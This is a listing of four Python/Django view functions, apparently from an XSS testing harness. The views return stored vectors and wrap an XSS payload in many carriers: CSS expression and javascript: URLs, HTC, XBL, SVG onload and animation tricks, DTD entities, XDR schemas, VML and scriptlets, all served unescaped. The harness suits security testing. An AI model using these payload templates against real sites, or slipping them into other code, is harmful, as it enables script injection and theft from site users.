Ejemplo n.º 1
def xss(request, vector_id):
    """Return the stored vector *vector_id* filled with the XSS payload.

    The ``Vector`` row is fetched by id, combined with ``xss_payload()`` by
    ``build_vector(..., "xss")``, run through the ``string_escape`` codec and
    sent back as the body of an ``HttpResponse``.  No content type is set
    here, so the response class default applies.

    NOTE(review): ``Vector`` is presumably a Django model, in which case a
    missing id raises out of ``objects.get`` and is not handled here.
    NOTE(review): the body is returned unescaped; that looks like the purpose
    of this test view -- confirm it is only routed on a dedicated test host.
    """
    vector = Vector.objects.get(id=vector_id)
    rendered = build_vector(vector, xss_payload(), "xss")
    # 'string_escape' is a Python 2 str codec: it turns backslash escapes in
    # the built vector into the characters they name.
    body = rendered.decode('string_escape')
    return HttpResponse(body)
Ejemplo n.º 2
def xss(request, vector_id):
    """Build the XSS instance of vector *vector_id* and return it as a response.

    Steps visible here: look the ``Vector`` up by id, hand it to
    ``build_vector`` together with ``xss_payload()`` and the ``"xss"`` tag,
    decode the result with ``string_escape`` and wrap it in ``HttpResponse``
    (default content type, nothing is overridden).

    NOTE(review): nothing catches a failed ``Vector.objects.get``; an unknown
    id presumably surfaces as an unhandled exception.
    NOTE(review): output is not escaped, which seems intentional for a vector
    test page -- verify the route is limited to an isolated test origin.
    """
    stored_vector = Vector.objects.get(id=vector_id)
    payload = xss_payload()
    instance = build_vector(stored_vector, payload, "xss")
    # The string_escape codec exists only for Python 2 byte strings; it
    # resolves backslash escape sequences contained in the instance text.
    return HttpResponse(instance.decode("string_escape"))
Ejemplo n.º 3
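def inc(request, context, vector_id, context_id, encoding_id, type):
    """Return the selected payload wrapped as an include (.js, .css, ...).

    ``context`` selects where the payload text comes from: ``"xss"`` calls
    ``xss_payload()``; ``"test"`` calls ``test_payload()`` with the three ids,
    the request's absolute root URL and the current ``Site``.  Any other
    value gets the ``"WTF BBQ?"`` body.

    ``type`` selects the wrapper template and, in the branches that set it,
    the ``Content-type`` header; the remaining branches return an
    ``HttpResponse`` with whatever content type it defaults to.  An
    unrecognised ``type`` gets the ``"fail !"`` body.  The parameter name
    shadows the ``type`` builtin inside this function; it is kept because
    callers may pass it by keyword.

    NOTE(review): every branch writes the payload into the response without
    escaping, so it runs in whichever origin serves this view.  That looks
    like the purpose of the harness -- confirm the URLconf only exposes it on
    a host dedicated to testing.
    """
    response = HttpResponse()

    if context == "xss":
        source = xss_payload()
    elif context == "test":
        # NOTE(review): build_absolute_uri() takes the host from the request,
        # so baseurl is only as trustworthy as Django's host validation
        # (ALLOWED_HOSTS) -- confirm it is configured for this deployment.
        baseurl = request.build_absolute_uri("/")
        domain = Site.objects.get_current()
        source = test_payload(vector_id, context_id, encoding_id, baseurl,
                              domain)
    else:
        return HttpResponse("WTF BBQ?")

    if type == "css":
        css = """  background-image: url('javascript:%(eval_p)s;');
  background-image: expression(%(eval_p)s);
  -moz-binding:url("%(xssmoz)s");
}{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}"""
        eval_p = eval_payload(source)
        response['Content-type'] = 'text/css'
        # xssmoz is always substituted with the empty string here.
        response.write(css % {'eval_p': eval_p, 'xssmoz': ''})
        return response
    elif type == "js":
        response['Content-type'] = 'application/javascript'
        response.write(source)
        return response
    elif type == "jpg":
        # The payload text itself is the body; only the header says JPEG.
        response['Content-type'] = 'image/jpeg'
        response.write(source)
        return response
    elif type == "htc":
        eval_p = eval_payload(source)
        # NOTE(review): source is concatenated into the template *before*
        # %-formatting, so a '%' inside source is read as a format directive
        # (and can raise).  Left as is; confirm whether that is intended.
        htc = """
        <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x>
        <PUBLIC:COMPONENT TAGNAME="xss">
   <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
   function main()
   {
     """ + source + """;
   }
</SCRIPT>"""
        response['Content-type'] = 'text/plain'
        response.write(htc % {'eval_p': eval_p})
        return response
    elif type == "html":
        return render_to_response('payload.html', {'source': source})
    elif type == "xbl":
        eval_p = eval_payload(source)
        xbl = """
        <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>"""
        return HttpResponse(xbl % {'eval_p': eval_p})
    elif type == "svg":
        eval_p = eval_payload(source)
        svg = """
        <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form>
        """
        response['Content-type'] = 'image/svg+xml'
        response.write(svg % {'eval_p': eval_p})
        return response
    elif type == "svg2":
        svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % {'eval_p': eval_p})
        return response
    elif type == "svg3":
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">  <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath>  <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern>  <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter>  <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker>  <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask>  <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient>  </svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % {'eval_p': eval_p})
        return response
    elif type == "svg4":
        # NOTE(review): this template has no %(eval_p)s placeholder, so the
        # formatted output is the fixed markup below and eval_p is unused.
        # The eval_payload() call is kept in case it has side effects.
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % {'eval_p': eval_p})
        return response
    elif type == "xxe":
        xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(xxe % {'eval_p': eval_p})
    elif type == "dtd":
        dtd = """<!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='%(eval_p)s'/&#x3E;">"""
        eval_p = eval_payload(source)
        return HttpResponse(dtd % {'eval_p': eval_p})
    elif type == "xdr":
        xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>"""
        eval_p = eval_payload(source)
        return HttpResponse(xdr % {'eval_p': eval_p})
    elif type == "evt":
        evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(evt % {'eval_p': eval_p})
    elif type == "vml":
        # The literal percent signs in the style attribute are doubled:
        # unescaped, "100%;" is parsed as a format directive and the
        # %-formatting below raises ValueError on every request.
        vml = """<xml> <rect style="height:100%%;width:100%%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>"""
        eval_p = eval_payload(source)
        return HttpResponse(vml % {'eval_p': eval_p})
    elif type == "sct":
        sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>"""
        eval_p = eval_payload(source)
        return HttpResponse(sct % {'eval_p': eval_p})
    elif type == "php":
        event = """Event: load\ndata: \n\n"""
        # NOTE(review): eval_p is computed but never written; the event body
        # carries an empty "data:" field.  Confirm whether that is intended.
        eval_p = eval_payload(source)
        response['Content-type'] = 'application/x-dom-event-stream'
        response.write(event)
        return response
    else:
        return HttpResponse("fail !")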
Ejemplo n.º 4
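def inc(request, context, vector_id, context_id, encoding_id, type):
    """Serve a payload as an include file of the requested kind.

    The payload text depends on ``context``: ``"xss"`` uses
    ``xss_payload()``, ``"test"`` uses ``test_payload()`` fed with the
    vector/context/encoding ids, the absolute root URL of the request and
    the current ``Site``.  Other contexts return the ``"WTF BBQ?"`` body.

    ``type`` picks the wrapper.  Some branches set a ``Content-type`` header
    on the shared ``response`` object; the others build a fresh
    ``HttpResponse`` and leave its content type at the default.  Unknown
    types return the ``"fail !"`` body.  ``type`` shadows the builtin of the
    same name within this function; the name is part of the view's signature
    and is therefore left alone.

    NOTE(review): the payload is emitted unescaped in every branch, which
    means it executes in the origin that hosts this view.  Presumably that is
    what the test harness is for -- confirm the route is limited to an
    isolated test origin.
    """
    response = HttpResponse()

    if context == "xss":
        source = xss_payload()
    elif context == "test":
        # NOTE(review): the host part of baseurl comes from the incoming
        # request; it relies on Django's host validation (ALLOWED_HOSTS)
        # being configured -- confirm.
        baseurl = request.build_absolute_uri("/")
        domain = Site.objects.get_current()
        source = test_payload(vector_id, context_id, encoding_id, baseurl, domain)
    else:
        return HttpResponse("WTF BBQ?")

    if type == "css":
        css = """  background-image: url('javascript:%(eval_p)s;');
  background-image: expression(%(eval_p)s);
  -moz-binding:url("%(xssmoz)s");
}{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}"""
        eval_p = eval_payload(source)
        response["Content-type"] = "text/css"
        # The xssmoz slot is filled with an empty string.
        response.write(css % {"eval_p": eval_p, "xssmoz": ""})
        return response
    elif type == "js":
        response["Content-type"] = "application/javascript"
        response.write(source)
        return response
    elif type == "jpg":
        # Body is the raw payload text; only the declared type is JPEG.
        response["Content-type"] = "image/jpeg"
        response.write(source)
        return response
    elif type == "htc":
        eval_p = eval_payload(source)
        # NOTE(review): source becomes part of the format string because it
        # is joined in before the % operator runs; a '%' in source would be
        # treated as a directive and may raise.  Behaviour kept; confirm.
        htc = (
            """
        <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x>
        <PUBLIC:COMPONENT TAGNAME="xss">
   <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
   function main()
   {
     """
            + source
            + """;
   }
</SCRIPT>"""
        )
        response["Content-type"] = "text/plain"
        response.write(htc % {"eval_p": eval_p})
        return response
    elif type == "html":
        return render_to_response("payload.html", {"source": source})
    elif type == "xbl":
        eval_p = eval_payload(source)
        xbl = """
        <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>"""
        return HttpResponse(xbl % {"eval_p": eval_p})
    elif type == "svg":
        eval_p = eval_payload(source)

        svg = """
        <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form>
        """
        response["Content-type"] = "image/svg+xml"
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg2":
        svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg3":
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">  <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath>  <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern>  <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter>  <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker>  <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask>  <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient>  </svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg4":
        # NOTE(review): no %(eval_p)s placeholder exists in this template, so
        # the response is the fixed markup and eval_p goes unused.  The call
        # to eval_payload() stays in case it has side effects.
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "xxe":
        xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(xxe % {"eval_p": eval_p})
    elif type == "dtd":
        dtd = """<!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='%(eval_p)s'/&#x3E;">"""
        eval_p = eval_payload(source)
        return HttpResponse(dtd % {"eval_p": eval_p})
    elif type == "xdr":
        xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>"""
        eval_p = eval_payload(source)
        return HttpResponse(xdr % {"eval_p": eval_p})
    elif type == "evt":
        evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(evt % {"eval_p": eval_p})
    elif type == "vml":
        # "100%" must be written "100%%" in a %-format template; with a bare
        # '%' the formatting call below raised ValueError ("unsupported
        # format character") instead of producing a response.
        vml = """<xml> <rect style="height:100%%;width:100%%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>"""
        eval_p = eval_payload(source)
        return HttpResponse(vml % {"eval_p": eval_p})
    elif type == "sct":
        sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>"""
        eval_p = eval_payload(source)
        return HttpResponse(sct % {"eval_p": eval_p})
    elif type == "php":
        event = """Event: load\ndata: \n\n"""
        # NOTE(review): eval_p is never written to the response; the event's
        # "data:" field is empty.  Confirm whether that is intended.
        eval_p = eval_payload(source)
        response["Content-type"] = "application/x-dom-event-stream"
        response.write(event)
        return response
    else:
        return HttpResponse("fail !")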